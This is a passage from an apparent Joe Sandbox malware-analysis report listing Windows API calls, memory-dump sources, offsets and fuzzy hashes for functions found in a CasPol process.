                                                                                      • Instruction Fuzzy Hash: 5541FCB1D002589FDB11CFE9C884ADEBFF5BF48310F14802AE858AB314D7319905CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0151C2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0151C04C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7AA5D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7AA5D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindWindowW.USER32(00000000,00000000), ref: 017610F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindWindow
                                                                                      • String ID:
                                                                                      • API String ID: 134000473-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,017642B1,00000800), ref: 01764392
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 01768DAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindWindowW.USER32(00000000,00000000), ref: 017610F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindWindow
                                                                                      • String ID:
                                                                                      • API String ID: 134000473-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1D7A53B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1D7A53B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 01768DAD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1D7A53B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindWindowW.USER32(00000000,00000000), ref: 017610F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindWindow
                                                                                      • String ID:
                                                                                      • API String ID: 134000473-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77d593a7c6a7951d137cc4c247f542f9bcea556c079b0ce59d02b30ae009bff0
                                                                                      • Instruction ID: 03cc5b3e96091e057f7630352db72e030d6e8aaeb929bdc1b68ea97539813018
                                                                                      • Opcode Fuzzy Hash: 77d593a7c6a7951d137cc4c247f542f9bcea556c079b0ce59d02b30ae009bff0
                                                                                      • Instruction Fuzzy Hash: 8D713A34728216CFDB15DF2CC994ABE7BE5AF89210B1900A5EA21CB371DB71DC41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1f02b3f9e410789ffe981a9ef5a47f0cd643a5a01c536b5be74fc459f438773
                                                                                      • Instruction ID: 3282eacd34a564c72e34321699dece32b66aa33a1821190c1a106343301dc97f
                                                                                      • Opcode Fuzzy Hash: f1f02b3f9e410789ffe981a9ef5a47f0cd643a5a01c536b5be74fc459f438773
                                                                                      • Instruction Fuzzy Hash: 43516775A1825ADFCF05CFE8C9549EEBBB2BF8C310F10811AE921AB350E7749995CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1320016e9e532d9898ddf2d3af53a10ccc736450828f10759df9bbcc4ee76272
                                                                                      • Instruction ID: 69caebaecc716f74580f8a2fa095a61d2795699dbd1813dce73540d8327184a5
                                                                                      • Opcode Fuzzy Hash: 1320016e9e532d9898ddf2d3af53a10ccc736450828f10759df9bbcc4ee76272
                                                                                      • Instruction Fuzzy Hash: A031F230B102158FEB189F78C4586AFBBB6AFC8244B10852DD516DB351DF34DC45CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f84ae4dfa139690775982dccd17c2fd110dc4ccd4e88a64e66393f274eb79eb
                                                                                      • Instruction ID: 7a3c7cb9442fd18e23e5131e3134392d18ecaa5ffbf4aece81a4a02ee302b952
                                                                                      • Opcode Fuzzy Hash: 7f84ae4dfa139690775982dccd17c2fd110dc4ccd4e88a64e66393f274eb79eb
                                                                                      • Instruction Fuzzy Hash: C831A275A0020A8BDB05CF69D8843A9F7B1FF84314F15C1AADA09DF256E775D845CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950352117.000000001D67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D67D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d67d000_CasPol.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950481715.000000001D68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D68D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d68d000_CasPol.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%